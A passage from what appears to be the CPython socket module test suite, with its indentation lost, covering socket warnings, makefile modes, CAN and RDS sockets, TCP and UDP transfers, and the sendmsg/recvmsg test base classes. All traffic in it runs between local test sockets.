self.check_sendall_interrupted(False)
def test_sendall_interrupted_with_timeout(self):
self.check_sendall_interrupted(True)
def test_dealloc_warn(self):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
r = repr(sock)
with self.assertWarns(ResourceWarning) as cm:
sock = None
support.gc_collect()
self.assertIn(r, str(cm.warning.args[0]))
# An open socket file object gets dereferenced after the socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
f = sock.makefile('rb')
r = repr(sock)
sock = None
support.gc_collect()
with self.assertWarns(ResourceWarning):
f = None
support.gc_collect()
def test_name_closed_socketio(self):
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
fp = sock.makefile("rb")
fp.close()
self.assertEqual(repr(fp), "<_io.BufferedReader name=-1>")
def test_unusable_closed_socketio(self):
with socket.socket() as sock:
fp = sock.makefile("rb", buffering=0)
self.assertTrue(fp.readable())
self.assertFalse(fp.writable())
self.assertFalse(fp.seekable())
fp.close()
self.assertRaises(ValueError, fp.readable)
self.assertRaises(ValueError, fp.writable)
self.assertRaises(ValueError, fp.seekable)
def test_makefile_mode(self):
for mode in 'r', 'rb', 'rw', 'w', 'wb':
with self.subTest(mode=mode):
with socket.socket() as sock:
with sock.makefile(mode) as fp:
self.assertEqual(fp.mode, mode)
def test_makefile_invalid_mode(self):
for mode in 'rt', 'x', '+', 'a':
with self.subTest(mode=mode):
with socket.socket() as sock:
with self.assertRaisesRegex(ValueError, 'invalid mode'):
sock.makefile(mode)
def test_pickle(self):
sock = socket.socket()
with sock:
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
self.assertRaises(TypeError, pickle.dumps, sock, protocol)
for protocol in range(pickle.HIGHEST_PROTOCOL + 1):
family = pickle.loads(pickle.dumps(socket.AF_INET, protocol))
self.assertEqual(family, socket.AF_INET)
type = pickle.loads(pickle.dumps(socket.SOCK_STREAM, protocol))
self.assertEqual(type, socket.SOCK_STREAM)
def test_listen_backlog(self):
for backlog in 0, -1:
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen(backlog)
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
srv.bind((HOST, 0))
srv.listen()
@support.cpython_only
def test_listen_backlog_overflow(self):
# Issue 15989
import _testcapi
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind((HOST, 0))
self.assertRaises(OverflowError, srv.listen, _testcapi.INT_MAX + 1)
srv.close()
@unittest.skipUnless(support.IPV6_ENABLED, 'IPv6 required for this test.')
def test_flowinfo(self):
self.assertRaises(OverflowError, socket.getnameinfo,
(support.HOSTv6, 0, 0xffffffff), 0)
with socket.socket(socket.AF_INET6, socket.SOCK_STREAM) as s:
self.assertRaises(OverflowError, s.bind, (support.HOSTv6, 0, -10))
def test_str_for_enums(self):
# Make sure that the AF_* and SOCK_* constants have enum-like string
# reprs.
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
self.assertEqual(str(s.family), 'AddressFamily.AF_INET')
self.assertEqual(str(s.type), 'SocketKind.SOCK_STREAM')
@unittest.skipIf(os.name == 'nt', 'Will not work on Windows')
def test_uknown_socket_family_repr(self):
# Test that when created with a family that's not one of the known
# AF_*/SOCK_* constants, socket.family just returns the number.
#
# To do this we fool socket.socket into believing it already has an
# open fd because on this path it doesn't actually verify the family and
# type and populates the socket object.
#
# On Windows this trick won't work, so the test is skipped.
fd, _ = tempfile.mkstemp()
with socket.socket(family=42424, type=13331, fileno=fd) as s:
self.assertEqual(s.family, 42424)
self.assertEqual(s.type, 13331)
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
class BasicCANTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_CAN
socket.PF_CAN
socket.CAN_RAW
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCMConstants(self):
socket.CAN_BCM
# opcodes
socket.CAN_BCM_TX_SETUP # create (cyclic) transmission task
socket.CAN_BCM_TX_DELETE # remove (cyclic) transmission task
socket.CAN_BCM_TX_READ # read properties of (cyclic) transmission task
socket.CAN_BCM_TX_SEND # send one CAN frame
socket.CAN_BCM_RX_SETUP # create RX content filter subscription
socket.CAN_BCM_RX_DELETE # remove RX content filter subscription
socket.CAN_BCM_RX_READ # read properties of RX content filter subscription
socket.CAN_BCM_TX_STATUS # reply to TX_READ request
socket.CAN_BCM_TX_EXPIRED # notification on performed transmissions (count=0)
socket.CAN_BCM_RX_STATUS # reply to RX_READ request
socket.CAN_BCM_RX_TIMEOUT # cyclic message is absent
socket.CAN_BCM_RX_CHANGED # updated CAN frame (detected content change)
def testCreateSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
pass
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testCreateBCMSocket(self):
with socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM) as s:
pass
def testBindAny(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.bind(('', ))
def testTooLongInterfaceName(self):
# most systems limit IFNAMSIZ to 16, take 1024 to be sure
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
self.assertRaisesRegex(OSError, 'interface name too long',
s.bind, ('x' * 1024,))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_LOOPBACK"),
'socket.CAN_RAW_LOOPBACK required for this test.')
def testLoopback(self):
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
for loopback in (0, 1):
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK,
loopback)
self.assertEqual(loopback,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_LOOPBACK))
@unittest.skipUnless(hasattr(socket, "CAN_RAW_FILTER"),
'socket.CAN_RAW_FILTER required for this test.')
def testFilter(self):
can_id, can_mask = 0x200, 0x700
can_filter = struct.pack("=II", can_id, can_mask)
with socket.socket(socket.PF_CAN, socket.SOCK_RAW, socket.CAN_RAW) as s:
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, can_filter)
self.assertEqual(can_filter,
s.getsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, 8))
s.setsockopt(socket.SOL_CAN_RAW, socket.CAN_RAW_FILTER, bytearray(can_filter))
@unittest.skipUnless(HAVE_SOCKET_CAN, 'SocketCan required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class CANTest(ThreadedCANSocketTest):
def __init__(self, methodName='runTest'):
ThreadedCANSocketTest.__init__(self, methodName=methodName)
@classmethod
def build_can_frame(cls, can_id, data):
"""Build a CAN frame."""
can_dlc = len(data)
data = data.ljust(8, b'\x00')
return struct.pack(cls.can_frame_fmt, can_id, can_dlc, data)
@classmethod
def dissect_can_frame(cls, frame):
"""Dissect a CAN frame."""
can_id, can_dlc, data = struct.unpack(cls.can_frame_fmt, frame)
return (can_id, can_dlc, data[:can_dlc])
def testSendFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
self.assertEqual(addr[0], self.interface)
self.assertEqual(addr[1], socket.AF_CAN)
def _testSendFrame(self):
self.cf = self.build_can_frame(0x00, b'\x01\x02\x03\x04\x05')
self.cli.send(self.cf)
def testSendMaxFrame(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
def _testSendMaxFrame(self):
self.cf = self.build_can_frame(0x00, b'\x07' * 8)
self.cli.send(self.cf)
def testSendMultiFrames(self):
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf1, cf)
cf, addr = self.s.recvfrom(self.bufsize)
self.assertEqual(self.cf2, cf)
def _testSendMultiFrames(self):
self.cf1 = self.build_can_frame(0x07, b'\x44\x33\x22\x11')
self.cli.send(self.cf1)
self.cf2 = self.build_can_frame(0x12, b'\x99\x22\x33')
self.cli.send(self.cf2)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def _testBCM(self):
cf, addr = self.cli.recvfrom(self.bufsize)
self.assertEqual(self.cf, cf)
can_id, can_dlc, data = self.dissect_can_frame(cf)
self.assertEqual(self.can_id, can_id)
self.assertEqual(self.data, data)
@unittest.skipUnless(hasattr(socket, "CAN_BCM"),
'socket.CAN_BCM required for this test.')
def testBCM(self):
bcm = socket.socket(socket.PF_CAN, socket.SOCK_DGRAM, socket.CAN_BCM)
self.addCleanup(bcm.close)
bcm.connect((self.interface,))
self.can_id = 0x123
self.data = bytes([0xc0, 0xff, 0xee])
self.cf = self.build_can_frame(self.can_id, self.data)
opcode = socket.CAN_BCM_TX_SEND
flags = 0
count = 0
ival1_seconds = ival1_usec = ival2_seconds = ival2_usec = 0
bcm_can_id = 0x0222
nframes = 1
assert len(self.cf) == 16
header = struct.pack(self.bcm_cmd_msg_fmt,
opcode,
flags,
count,
ival1_seconds,
ival1_usec,
ival2_seconds,
ival2_usec,
bcm_can_id,
nframes,
)
header_plus_frame = header + self.cf
bytes_sent = bcm.send(header_plus_frame)
self.assertEqual(bytes_sent, len(header_plus_frame))
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
class BasicRDSTest(unittest.TestCase):
def testCrucialConstants(self):
socket.AF_RDS
socket.PF_RDS
def testCreateSocket(self):
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
pass
def testSocketBufferSize(self):
bufsize = 16384
with socket.socket(socket.PF_RDS, socket.SOCK_SEQPACKET, 0) as s:
s.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, bufsize)
s.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, bufsize)
@unittest.skipUnless(HAVE_SOCKET_RDS, 'RDS sockets required for this test.')
@unittest.skipUnless(thread, 'Threading required for this test.')
class RDSTest(ThreadedRDSSocketTest):
def __init__(self, methodName='runTest'):
ThreadedRDSSocketTest.__init__(self, methodName=methodName)
def setUp(self):
super().setUp()
self.evt = threading.Event()
def testSendAndRecv(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
self.assertEqual(self.cli_addr, addr)
def _testSendAndRecv(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testPeek(self):
data, addr = self.serv.recvfrom(self.bufsize, socket.MSG_PEEK)
self.assertEqual(self.data, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testPeek(self):
self.data = b'spam'
self.cli.sendto(self.data, 0, (HOST, self.port))
@requireAttrs(socket.socket, 'recvmsg')
def testSendAndRecvMsg(self):
data, ancdata, msg_flags, addr = self.serv.recvmsg(self.bufsize)
self.assertEqual(self.data, data)
@requireAttrs(socket.socket, 'sendmsg')
def _testSendAndRecvMsg(self):
self.data = b'hello ' * 10
self.cli.sendmsg([self.data], (), 0, (HOST, self.port))
def testSendAndRecvMulti(self):
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data1, data)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data2, data)
def _testSendAndRecvMulti(self):
self.data1 = b'bacon'
self.cli.sendto(self.data1, 0, (HOST, self.port))
self.data2 = b'egg'
self.cli.sendto(self.data2, 0, (HOST, self.port))
def testSelect(self):
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
data, addr = self.serv.recvfrom(self.bufsize)
self.assertEqual(self.data, data)
def _testSelect(self):
self.data = b'select'
self.cli.sendto(self.data, 0, (HOST, self.port))
def testCongestion(self):
# wait until the sender is done
self.evt.wait()
def _testCongestion(self):
# test the behavior in case of congestion
self.data = b'fill'
self.cli.setblocking(False)
try:
# try to lower the receiver's socket buffer size
self.cli.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, 16384)
except OSError:
pass
with self.assertRaises(OSError) as cm:
try:
# fill the receiver's socket buffer
while True:
self.cli.sendto(self.data, 0, (HOST, self.port))
finally:
# signal the receiver we're done
self.evt.set()
# sendto() should have failed with ENOBUFS
self.assertEqual(cm.exception.errno, errno.ENOBUFS)
# and we should have received a congestion notification through poll
r, w, x = select.select([self.serv], [], [], 3.0)
self.assertIn(self.serv, r)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicTCPTest(SocketConnectedTest):
def __init__(self, methodName='runTest'):
SocketConnectedTest.__init__(self, methodName=methodName)
def testRecv(self):
# Testing large receive over TCP
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
def _testRecv(self):
self.serv_conn.send(MSG)
def testOverFlowRecv(self):
# Testing receive in chunks over TCP
seg1 = self.cli_conn.recv(len(MSG) - 3)
seg2 = self.cli_conn.recv(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecv(self):
self.serv_conn.send(MSG)
def testRecvFrom(self):
# Testing large recvfrom() over TCP
msg, addr = self.cli_conn.recvfrom(1024)
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.serv_conn.send(MSG)
def testOverFlowRecvFrom(self):
# Testing recvfrom() in chunks over TCP
seg1, addr = self.cli_conn.recvfrom(len(MSG)-3)
seg2, addr = self.cli_conn.recvfrom(1024)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testOverFlowRecvFrom(self):
self.serv_conn.send(MSG)
def testSendAll(self):
# Testing sendall() with a 2048 byte string over TCP
msg = b''
while 1:
read = self.cli_conn.recv(1024)
if not read:
break
msg += read
self.assertEqual(msg, b'f' * 2048)
def _testSendAll(self):
big_chunk = b'f' * 2048
self.serv_conn.sendall(big_chunk)
def testFromFd(self):
# Testing fromfd()
fd = self.cli_conn.fileno()
sock = socket.fromfd(fd, socket.AF_INET, socket.SOCK_STREAM)
self.addCleanup(sock.close)
self.assertIsInstance(sock, socket.socket)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testFromFd(self):
self.serv_conn.send(MSG)
def testDup(self):
# Testing dup()
sock = self.cli_conn.dup()
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDup(self):
self.serv_conn.send(MSG)
def testShutdown(self):
# Testing shutdown()
msg = self.cli_conn.recv(1024)
self.assertEqual(msg, MSG)
# wait for _testShutdown to finish: on OS X, when the server
# closes the connection the client also becomes disconnected,
# and the client's shutdown call will fail. (Issue #4397.)
self.done.wait()
def _testShutdown(self):
self.serv_conn.send(MSG)
self.serv_conn.shutdown(2)
testShutdown_overflow = support.cpython_only(testShutdown)
@support.cpython_only
def _testShutdown_overflow(self):
import _testcapi
self.serv_conn.send(MSG)
# Issue 15989
self.assertRaises(OverflowError, self.serv_conn.shutdown,
_testcapi.INT_MAX + 1)
self.assertRaises(OverflowError, self.serv_conn.shutdown,
2 + (_testcapi.UINT_MAX + 1))
self.serv_conn.shutdown(2)
def testDetach(self):
# Testing detach()
fileno = self.cli_conn.fileno()
f = self.cli_conn.detach()
self.assertEqual(f, fileno)
# cli_conn cannot be used anymore...
self.assertTrue(self.cli_conn._closed)
self.assertRaises(OSError, self.cli_conn.recv, 1024)
self.cli_conn.close()
# ...but we can create another socket using the (still open)
# file descriptor
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, fileno=f)
self.addCleanup(sock.close)
msg = sock.recv(1024)
self.assertEqual(msg, MSG)
def _testDetach(self):
self.serv_conn.send(MSG)
@unittest.skipUnless(thread, 'Threading required for this test.')
class BasicUDPTest(ThreadedUDPSocketTest):
def __init__(self, methodName='runTest'):
ThreadedUDPSocketTest.__init__(self, methodName=methodName)
def testSendtoAndRecv(self):
# Testing sendto() and Recv() over UDP
msg = self.serv.recv(len(MSG))
self.assertEqual(msg, MSG)
def _testSendtoAndRecv(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFrom(self):
# Testing recvfrom() over UDP
msg, addr = self.serv.recvfrom(len(MSG))
self.assertEqual(msg, MSG)
def _testRecvFrom(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
def testRecvFromNegative(self):
# Negative lengths passed to recvfrom should give ValueError.
self.assertRaises(ValueError, self.serv.recvfrom, -1)
def _testRecvFromNegative(self):
self.cli.sendto(MSG, 0, (HOST, self.port))
# Tests for the sendmsg()/recvmsg() interface. Where possible, the
# same test code is used with different families and types of socket
# (e.g. stream, datagram), and tests using recvmsg() are repeated
# using recvmsg_into().
#
# The generic test classes such as SendmsgTests and
# RecvmsgGenericTests inherit from SendrecvmsgBase and expect to be
# supplied with sockets cli_sock and serv_sock representing the
# client's and the server's end of the connection respectively, and
# attributes cli_addr and serv_addr holding their (numeric where
# appropriate) addresses.
#
# The final concrete test classes combine these with subclasses of
# SocketTestBase which set up client and server sockets of a specific
# type, and with subclasses of SendrecvmsgBase such as
# SendrecvmsgDgramBase and SendrecvmsgConnectedBase which map these
# sockets to cli_sock and serv_sock and override the methods and
# attributes of SendrecvmsgBase to fill in destination addresses if
# needed when sending, check for specific flags in msg_flags, etc.
#
# RecvmsgIntoMixin provides a version of doRecvmsg() implemented using
# recvmsg_into().
# XXX: like the other datagram (UDP) tests in this module, the code
# here assumes that datagram delivery on the local machine will be
# reliable.
class SendrecvmsgBase(ThreadSafeCleanupTestCase):
# Base class for sendmsg()/recvmsg() tests.
# Time in seconds to wait before considering a test failed, or
# None for no timeout. Not all tests actually set a timeout.
fail_timeout = 3.0
def setUp(self):
self.misc_event = threading.Event()
super().setUp()
def sendToServer(self, msg):
# Send msg to the server.
return self.cli_sock.send(msg)
# Tuple of alternative default arguments for sendmsg() when called
# via sendmsgToServer() (e.g. to include a destination address).
sendmsg_to_server_defaults = ()
def sendmsgToServer(self, *args):
# Call sendmsg() on self.cli_sock with the given arguments,
# filling in any arguments which are not supplied with the
# corresponding items of self.sendmsg_to_server_defaults, if
# any.
return self.cli_sock.sendmsg(
*(args + self.sendmsg_to_server_defaults[len(args):]))
def doRecvmsg(self, sock, bufsize, *args):
# Call recvmsg() on sock with given arguments and return its
# result. Should be used for tests which can use either
# recvmsg() or recvmsg_into() - RecvmsgIntoMixin overrides
# this method with one which emulates it using recvmsg_into(),
# thus allowing the same test to be used for both methods.
result = sock.recvmsg(bufsize, *args)
self.registerRecvmsgResult(result)
return result
def registerRecvmsgResult(self, result):
# Called by doRecvmsg() with the return value of recvmsg() or
# recvmsg_into(). Can be overridden to arrange cleanup based
# on the returned ancillary data, for instance.
pass
def checkRecvmsgAddress(self, addr1, addr2):
# Called to compare the received address with the address of
# the peer.
self.assertEqual(addr1, addr2)
# Flags that are normally unset in msg_flags
msg_flags_common_unset = 0
for name in ("MSG_CTRUNC", "MSG_OOB"):
msg_flags_common_unset |= getattr(socket, name, 0)
# Flags that are normally set
msg_flags_common_set = 0
# Flags set when a complete record has been received (e.g. MSG_EOR
# for SCTP)
msg_flags_eor_indicator = 0
# Flags set when a complete record has not been received
# (e.g. MSG_TRUNC for datagram sockets)
msg_flags_non_eor_indicator = 0
def checkFlags(self, flags, eor=None, checkset=0, checkunset=0, ignore=0):
# Method to check the value of msg_flags returned by recvmsg[_into]().
#
# Checks that all bits in msg_flags_common_set attribute are
# set in "flags" and all bits in msg_flags_common_unset are
# unset.
#
# The "eor" argument specifies whether the flags should
# indicate that a full record (or datagram) has been received.
# If "eor" is None, no checks are done; otherwise, checks
# that:
#
# * if "eor" is true, all bits in msg_flags_eor_indicator are
# set and all bits in msg_flags_non_eor_indicator are unset
#
# * if "eor" is false, all bits in msg_flags_non_eor_indicator
# are set and all bits in msg_flags_eor_indicator are unset
#
# If "checkset" and/or "checkunset" are supplied, they require
# the given bits to be set or unset respectively, overriding
# what the attributes require for those bits.
#
# If any bits are set in "ignore", they will not be checked,
# regardless of the other inputs.
#
# Will raise Exception if the inputs require a bit to be both
# set and unset, and it is not ignored.
defaultset = self.msg_flags_common_set
defaultunset = self.msg_flags_common_unset
if eor:
defaultset |= self.msg_flags_eor_indicator
defaultunset |= self.msg_flags_non_eor_indicator
elif eor is not None:
defaultset |= self.msg_flags_non_eor_indicator
defaultunset |= self.msg_flags_eor_indicator
# Function arguments override defaults
defaultset &= ~checkunset
defaultunset &= ~checkset
# Merge arguments with remaining defaults, and check for conflicts
checkset |= defaultset
checkunset |= defaultunset
inboth = checkset & checkunset & ~ignore
if inboth:
raise Exception("contradictory set, unset requirements for flags "
"{0:#x}".format(inboth))
# Compare with given msg_flags value
mask = (checkset | checkunset) & ~ignore
self.assertEqual(flags & mask, checkset & mask)
class RecvmsgIntoMixin(SendrecvmsgBase):
# Mixin to implement doRecvmsg() using recvmsg_into().
def doRecvmsg(self, sock, bufsize, *args):
buf = bytearray(bufsize)
result = sock.recvmsg_into([buf], *args)
self.registerRecvmsgResult(result)
self.assertGreaterEqual(result[0], 0)
self.assertLessEqual(result[0], bufsize)
return (bytes(buf[:result[0]]),) + result[1:]
class SendrecvmsgDgramFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for datagram sockets.
@property
def msg_flags_non_eor_indicator(self):
return super().msg_flags_non_eor_indicator | socket.MSG_TRUNC
class SendrecvmsgSCTPFlagsBase(SendrecvmsgBase):
# Defines flags to be checked in msg_flags for SCTP sockets.
@property
def msg_flags_eor_indicator(self):
return super().msg_flags_eor_indicator | socket.MSG_EOR
class SendrecvmsgConnectionlessBase(SendrecvmsgBase):
# Base class for tests on connectionless-mode sockets. Users must
# supply sockets on attributes cli and serv to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.serv
@property
def cli_sock(self):
return self.cli
@property
def sendmsg_to_server_defaults(self):
return ([], [], 0, self.serv_addr)
def sendToServer(self, msg):
return self.cli_sock.sendto(msg, self.serv_addr)
class SendrecvmsgConnectedBase(SendrecvmsgBase):
# Base class for tests on connected sockets. Users must supply
# sockets on attributes serv_conn and cli_conn (representing the
# connections *to* the server and the client), to be mapped to
# cli_sock and serv_sock respectively.
@property
def serv_sock(self):
return self.cli_conn
@property
def cli_sock(self):
return self.serv_conn
def checkRecvmsgAddress(self, addr1, addr2):
# Address is currently "unspecified" for a connected socket,
# so we don't examine it
pass
class SendrecvmsgServerTimeoutBase(SendrecvmsgBase):
# Base class to set a timeout on server's socket.
def setUp(self):
super().setUp()
self.serv_sock.settimeout(self.fail_timeout)
class SendmsgTests(SendrecvmsgServerTimeoutBase):
# Tests for sendmsg() which can use any socket type and do not
# involve recvmsg() or recvmsg_into().
def testSendmsg(self):
# Send a simple message with sendmsg().
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG]), len(MSG))
def testSendmsgDataGenerator(self):
# Send from buffer obtained from a generator (not a sequence).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgDataGenerator(self):
self.assertEqual(self.sendmsgToServer((o for o in [MSG])),
len(MSG))
def testSendmsgAncillaryGenerator(self):
# Gather (empty) ancillary data from a generator.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgAncillaryGenerator(self):
self.assertEqual(self.sendmsgToServer([MSG], (o for o in [])),
len(MSG))
def testSendmsgArray(self):
# Send data from an array instead of the usual bytes object.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgArray(self):
self.assertEqual(self.sendmsgToServer([array.array("B", MSG)]),
len(MSG))
def testSendmsgGather(self):
# Send message data from more than one buffer (gather write).
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgGather(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
def testSendmsgBadArgs(self):
# Check that sendmsg() rejects invalid arguments.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadArgs(self):
self.assertRaises(TypeError, self.cli_sock.sendmsg)
self.assertRaises(TypeError, self.sendmsgToServer,
b"not in an iterable")
self.assertRaises(TypeError, self.sendmsgToServer,
object())
self.assertRaises(TypeError, self.sendmsgToServer,
[object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG, object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], object())
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [], 0, object())
self.sendToServer(b"done")
def testSendmsgBadCmsg(self):
# Check that invalid ancillary data items are rejected.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgBadCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [object()])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(object(), 0, b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, object(), b"data")])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, object())])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0)])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b"data", 42)])
self.sendToServer(b"done")
@requireAttrs(socket, "CMSG_SPACE")
def testSendmsgBadMultiCmsg(self):
# Check that invalid ancillary data items are rejected when
# more than one item is present.
self.assertEqual(self.serv_sock.recv(1000), b"done")
@testSendmsgBadMultiCmsg.client_skip
def _testSendmsgBadMultiCmsg(self):
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [0, 0, b""])
self.assertRaises(TypeError, self.sendmsgToServer,
[MSG], [(0, 0, b""), object()])
self.sendToServer(b"done")
def testSendmsgExcessCmsgReject(self):
# Check that sendmsg() rejects excess ancillary data items
# when the number that can be sent is limited.
self.assertEqual(self.serv_sock.recv(1000), b"done")
def _testSendmsgExcessCmsgReject(self):
if not hasattr(socket, "CMSG_SPACE"):
# Can only send one item
with self.assertRaises(OSError) as cm:
self.sendmsgToServer([MSG], [(0, 0, b""), (0, 0, b"")])
self.assertIsNone(cm.exception.errno)
self.sendToServer(b"done")
def testSendmsgAfterClose(self):
# Check that sendmsg() fails on a closed socket.
pass
def _testSendmsgAfterClose(self):
self.cli_sock.close()
self.assertRaises(OSError, self.sendmsgToServer, [MSG])
class SendmsgStreamTests(SendmsgTests):
# Tests for sendmsg() which require a stream socket and do not
# involve recvmsg() or recvmsg_into().
def testSendmsgExplicitNoneAddr(self):
# Check that peer address can be specified as None.
self.assertEqual(self.serv_sock.recv(len(MSG)), MSG)
def _testSendmsgExplicitNoneAddr(self):
self.assertEqual(self.sendmsgToServer([MSG], [], 0, None), len(MSG))
def testSendmsgTimeout(self):
# Check that timeout works with sendmsg().
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
def _testSendmsgTimeout(self):
try:
self.cli_sock.settimeout(0.03)
with self.assertRaises(socket.timeout):
while True:
self.sendmsgToServer([b"a"*512])
finally:
self.misc_event.set()
# XXX: would be nice to have more tests for sendmsg flags argument.
# Linux supports MSG_DONTWAIT when sending, but in general, it
# only works when receiving. Could add other platforms if they
# support it too.
@skipWithClientIf(sys.platform not in {"linux"},
"MSG_DONTWAIT not known to work on this platform when "
"sending")
def testSendmsgDontWait(self):
# Check that MSG_DONTWAIT in flags causes non-blocking behaviour.
self.assertEqual(self.serv_sock.recv(512), b"a"*512)
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@testSendmsgDontWait.client_skip
def _testSendmsgDontWait(self):
try:
with self.assertRaises(OSError) as cm:
while True:
self.sendmsgToServer([b"a"*512], [], socket.MSG_DONTWAIT)
self.assertIn(cm.exception.errno,
(errno.EAGAIN, errno.EWOULDBLOCK))
finally:
self.misc_event.set()
class SendmsgConnectionlessTests(SendmsgTests):
# Tests for sendmsg() which require a connectionless-mode
# (e.g. datagram) socket, and do not involve recvmsg() or
# recvmsg_into().
def testSendmsgNoDestAddr(self):
# Check that sendmsg() fails when no destination address is
# given for unconnected socket.
pass
def _testSendmsgNoDestAddr(self):
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG])
self.assertRaises(OSError, self.cli_sock.sendmsg,
[MSG], [], 0, None)
class RecvmsgGenericTests(SendrecvmsgBase):
# Tests for recvmsg() which can also be emulated using
# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
# FreeBSD < 8 doesn't always set the MSG_TRUNC flag when a truncated
# datagram is received (issue #13001).
@support.requires_freebsd_version(8)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
